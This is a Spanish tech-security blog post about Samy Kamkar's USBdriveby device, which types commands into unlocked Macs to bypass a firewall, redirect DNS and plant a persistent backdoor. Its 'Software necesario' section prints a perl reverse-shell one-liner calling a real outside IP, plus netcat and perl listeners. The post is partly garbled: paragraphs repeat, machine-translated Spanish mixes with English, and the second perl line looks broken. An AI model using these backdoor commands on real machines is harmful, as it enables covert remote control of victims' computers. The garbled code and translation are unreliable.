Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1068
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
▼
2014
(Total:
185
)
-
▼
diciembre
(Total:
38
)
- MegaChat: el nuevo Skype con cifrado seguro de Kim...
- Hackean Modems USB 4G y tarjetas SIM usando mensaj...
- Lizard Squad para los ataques DDos a PSN y XBOX Li...
- Hackean la web de AEDE en protesta contra el canon
- El proveedor de hosting DinaHosting sufre un ataqu...
- Kodi 14 Helix, el MediaCenter libre y multiplatafo...
- Un adolescente de 17 años de Londres se declara cu...
- SMB Worm Tool es la herramienta usada en el ataque...
- Publican el código fuente de The Open Bay como Ope...
- Disponible John the Ripper 1.8.0-jumbo-1
- Vídeo demostración de BadUSB con USBdriveby en Mac...
- ShadowCrypt, una extensión de Chrome para cifrar c...
- La extensión de Chrome para cifrar e-mails llega a...
- Vulnerabilidad Misfortune Cookie - La galleta de l...
- La ICANN fue objeto de un ataque de spear phishing
- El FBI utilizó Metasploit para descubrir a usuario...
- Análisis del ransomware TorrentLocker
- Disponible Wifislax 4.10 versión Final
- Detenido a un exdirectivo de Intereconomía por con...
- UFONet - DDoS via WebAbuse - v0.4b "Infection"
- Google Zeitgeist 2014: Lo más buscado en Google
- CryptPHP el malware que afecta a WordPress, Drupal...
- Recopilación de más de 100 libros sobre programaci...
- Snort++ aka Snort 3.0 - Network intrusion preventi...
- ODROID-C1, una alternativa a la Raspberry Pi
- msfpayload y msfencode desaparecerán de Metasploit
- Conferencias de seguridad en Santander: Sh3llCON -...
- thepiratebay.cr NO es el nuevo dominio de The Pira...
- Adobe Flash Player 16 ya se encuentra disponible
- Lizard Squad amenaza con tirar Xbox Live el día de...
- Los vídeos más vistos de YouTube en 2014
- Un redada policial en Suecia deja sin servicio a T...
- Poodle también afecta a TLS 1.2
- Alerta por infecciones masivas por e-mail falso de...
- Solucionada grave vulnerabilidad CSRF en Paypal
- La red temática Criptored cumple 15 años
- (PoC) Proof of Concept Wordpress y Drupal (CVE-201...
- Samurai Web Testing Framework 3.0: LiveDVD para au...
- ► septiembre (Total: 18 )
-
▼
diciembre
(Total:
38
)
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
396
)
privacidad
(
364
)
google
(
354
)
ransomware
(
341
)
vulnerabilidad
(
304
)
Malware
(
264
)
Windows
(
246
)
android
(
243
)
cve
(
236
)
tutorial
(
236
)
manual
(
221
)
software
(
205
)
hardware
(
193
)
linux
(
125
)
twitter
(
116
)
ddos
(
95
)
WhatsApp
(
91
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
67
)
app
(
65
)
Networking
(
56
)
nvidia
(
52
)
ssd
(
51
)
youtube
(
50
)
adobe
(
43
)
firmware
(
43
)
office
(
41
)
hack
(
40
)
firefox
(
36
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
apache
(
26
)
MAC
(
25
)
programación
(
25
)
exploit
(
23
)
multimedia
(
23
)
javascript
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
Si estos días vas a cualquiera de las plataformas de venta que hay en internet y buscas un USB probablemente te encuentras con no pocos con ...
-
Trinity asegura haber robado 560 GB de datos de la Agencia Tributaria (AEAT) española, así como haber secuestrado parte de sus sistemas, ci...
Vídeo demostración de BadUSB con USBdriveby en Mac OS X
viernes, 19 de diciembre de 2014
|
Publicado por
el-brujo
|
Editar entrada
Samy Kamkar es el autor de una pequeña pieza de hardware llamada USBDriveBy
que sirve para tomar el control de cualquier equipo OSX siempre y
cuando no esté protegido por contraseña. El dispositivo es una sencilla
placa controladora unida a un puerto USB.
En concreto, cuando se conecta normalmente en un ratón o un teclado en una máquina, no se requiere autorización para empezar a usarlos. Los dispositivos pueden simplemente comenzar a escribir y hacer clic. Aprovechamos este hecho mediante el envío de pulsaciones de teclas arbitrarios significan para lanzar aplicaciones específicas (a través de Spotlight / Alfred / Quicksilver), evadir permanentemente un firewall local (Little Snitch), instale un shell inversa en crontab, e incluso modificar la configuración DNS sin permisos adicionales.
Aunque este ejemplo es el OS X, es fácilmente extensible para Windows y * nix.
Incluso nos evadimos de seguridad de OS X - mientras tratan de evitar cambios en la red están realizando con sólo un "teclado", e incluso prevenir la mayoría de las aplicaciones de cambiar de posición (características especiales de accesibilidad autorizados deben estar habilitadas que no tenemos permiso para), que evadir ambas cosas con un poco de applescript sin protección y los movimientos del ratón cuidadosamente planificadas. Mientras que un dispositivo como Rubber Ducky es similar, es incapaz de montar los mismos ataques, ya que carece de HID Ratón emulación.
I've written it for both Teensy and Arduino microcontrollers, however not all Arduinos are capable of emulating a USB HID keyboard/mouse (the Arduino Nano specifically cannot).
I've created a DNS server which responds to normal DNS requests properly, however sends spoofed answers for specific hostnames. This runs on a remote host and allows us to manipulate the traffic of the system that's been hit by USBdriveby.
This is also available on my github: https://github.com/samyk/usbdriveby
My DNS spoofer depends on the Net::DNS suite of perl modules.
perl backdoor
We use a perl backdoor I developed as virtually all OS X and *nix machines have perl installed by default. You'll find many of these systems don't come with a C compiler, especially in the bare bones version, but perl is always quietly available.
To evade the local router and not require any ports opening up, we produce a reverse shell by connecting out to a server we control every 5 minutes via crontab, and once the connection is established, we can begin sending commands to the compromised machine. If the connection dies, the compromised system will connect back within 5 minutes. netcat is an easy way to support this.
You could also use perl in lieu of netcat again:
Fuente:
http://es.gizmodo.com/este-aterrador-video-muestra-lo-facil-que-es-hackear-un-1672786120
Basta conectar la USBDribeBy
a un equipo para que se identifique como un teclado y un ratón
convencionales, abra la aplicación Terminal, instale una puerta trasera
en Chrome, configure apropiadamente los ajustes de red, recoja sus cosas
y deje todo como estaba. El proceso es completamente automático y
apenas dura un minuto en el que el ordenador, eso sí, parece poseído por
el mismísimo Satán.
El
resultado es que todo el tráfico del equipo se redirige al ordenador del
asaltante, que puede espiar lo que quiera o tomar el control del equipo
hackeado en el momento en el que lo considere necesario.
Algunos de
los cambios en la configuración se resisten a realizarse solo desde un
teclado, pero Kamkar ha encontrado maneras de sortear esos obstáculos
mediante movimientos ciegos de ratón. Aunque este hacker ha realizado la
prueba en un Mac, asegura que es perfectamente aplicable a Windows y
Linux.
Evidentemente,
el hack no es tan temible si protegemos nuestro equipo mediante una
contraseña de entrada, pero los ciberdelincuentes no suelen ser
amistosos hackers con un USB al cuello que muestran sus progresos en
YouTube. Si Samy ha logrado hacer esto, seguramente otros hayan dado con
formas peores de aprovechar el USB. La propia BadUSB es más peligrosa
por la cantidad de malware que permite inocular. [Samy Kamkar vía Hacker News]
En este proyecto, vamos a aprender cómo explotar la confianza ciega de un sistema en dispositivos USB, y aprender cómo un microcontrolador Teensy $ 20 puede evadir varios ajustes de seguridad en un sistema real, abre una puerta trasera permanente, desactivar un servidor de seguridad, controlar el flujo de la red tráfico, y todo dentro de un par de segundos y de forma permanente, incluso después de que el dispositivo ha sido eliminado.
En concreto, cuando se conecta normalmente en un ratón o un teclado en una máquina, no se requiere autorización para empezar a usarlos. Los dispositivos pueden simplemente comenzar a escribir y hacer clic. Aprovechamos este hecho mediante el envío de pulsaciones de teclas arbitrarios significan para lanzar aplicaciones específicas (a través de Spotlight / Alfred / Quicksilver), evadir permanentemente un firewall local (Little Snitch), instale un shell inversa en crontab, e incluso modificar la configuración DNS sin permisos adicionales.
Aunque este ejemplo es el OS X, es fácilmente extensible para Windows y * nix.
Incluso nos evadimos de seguridad de OS X - mientras tratan de evitar cambios en la red están realizando con sólo un "teclado", e incluso prevenir la mayoría de las aplicaciones de cambiar de posición (características especiales de accesibilidad autorizados deben estar habilitadas que no tenemos permiso para), que evadir ambas cosas con un poco de applescript sin protección y los movimientos del ratón cuidadosamente planificadas. Mientras que un dispositivo como Rubber Ducky es similar, es incapaz de montar los mismos ataques, ya que carece de HID Ratón emulación.
Software necesario
- USBdriveby You can acquire the USBdriveby microcontroller source code from my github: https://github.com/samyk/usbdriveby
I've written it for both Teensy and Arduino microcontrollers, however not all Arduinos are capable of emulating a USB HID keyboard/mouse (the Arduino Nano specifically cannot).
- dns_spoofer.pl
I've created a DNS server which responds to normal DNS requests properly, however sends spoofed answers for specific hostnames. This runs on a remote host and allows us to manipulate the traffic of the system that's been hit by USBdriveby.
This is also available on my github: https://github.com/samyk/usbdriveby
- Net::DNS
My DNS spoofer depends on the Net::DNS suite of perl modules.
perl backdoor
We use a perl backdoor I developed as virtually all OS X and *nix machines have perl installed by default. You'll find many of these systems don't come with a C compiler, especially in the bare bones version, but perl is always quietly available.
perl -MIO::Socket -e'$c=new IO::Socket::INET("72.14.179.47:1337");print$c `$_`while<$c>'
- netcat
To evade the local router and not require any ports opening up, we produce a reverse shell by connecting out to a server we control every 5 minutes via crontab, and once the connection is established, we can begin sending commands to the compromised machine. If the connection dies, the compromised system will connect back within 5 minutes. netcat is an easy way to support this.
netcat -l 1337
You could also use perl in lieu of netcat again:
perl -MIO -e'$c=new IO::Socket::INET(LocalPort,1337,Listen)->accept;print$c $_ while'
Fuente:
http://es.gizmodo.com/este-aterrador-video-muestra-lo-facil-que-es-hackear-un-1672786120
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.